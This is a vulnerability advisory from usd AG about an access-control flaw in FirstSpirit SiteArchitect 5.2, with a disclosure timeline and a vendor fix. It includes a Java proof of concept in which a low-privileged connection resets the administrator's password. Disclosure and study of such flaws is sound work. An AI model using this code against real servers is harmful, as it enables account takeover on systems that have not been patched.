usd-2018-0012 | FirstSpirit SiteArchitect/5.2


Advisory ID: usd-2018-0012
CVE Number: N/A
Affected Product: FirstSpirit SiteArchitect
Affected Version: 5.2
Vulnerability Type: Improper Access Control
Security Risk: High
Vendor URL: https://www.e-spirit.com/de/
Vendor Status: Fixed according to vendor in version 5.2.2109

Description

Administrative functions are not properly protected by access control. This allows attackers access to administrative function such as changing passwords or adding new users.

Access control involves the use of several protection mechanisms such as authentication, authorization and accountability. When any mechanism is not applied or otherwise fails, attackers can compromise the security of the software by gaining privileges, reading sensitive information, executing commands, evading detection, etc.

Proof of Concept 

Generic example case:

public static void main(String[] args) throws Exception {
ConnectionManager.setProxy((Proxy) null);
ConnectionManager.setCompression((byte) 0);
ConnectionManager.setEncryption((byte) 2);
ConnectionManager.setUseHttps(false);

ServerConnection c = (ServerConnection) ConnectionManager.getConnection(“”, 8000, 1, “user”, “password”);
c.connect();

UserManager userManager = c.getManager(UserManager.class);
UserDTO admin = userManager.getAdminUser();
admin.setPassword(“test”);
userManager.updateUserData(admin);
}

Fix

Access to sensitive functions should be avoided. Necessary access should be protected by authentication and a global access control explicitly.

Timeline

  • 2018-04-04 First contact request via info@e-spirit.com
  • 2018-04-24 Send vulnerabilities to vendor
  • 2018-05-15 Vendor releases a patch to fix the vulnerabilities
  • 2018-07-06 Security advisory released

Credits

This security vulnerabilities were found by Sebastian Puttkammer of usd AG.